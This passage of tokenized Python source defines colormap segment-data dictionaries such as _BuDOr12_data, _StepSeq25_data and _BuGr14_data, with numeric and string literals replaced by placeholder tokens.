<NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] <EOL> } <EOL> _BuDOr12_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _StepSeq25_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _RdYlBu11b_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _Bu7_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] <EOL> } <EOL> _BuOr12_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _BuGr14_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] <EOL> } <EOL> _BuDRd18_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _BuDOr18_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> 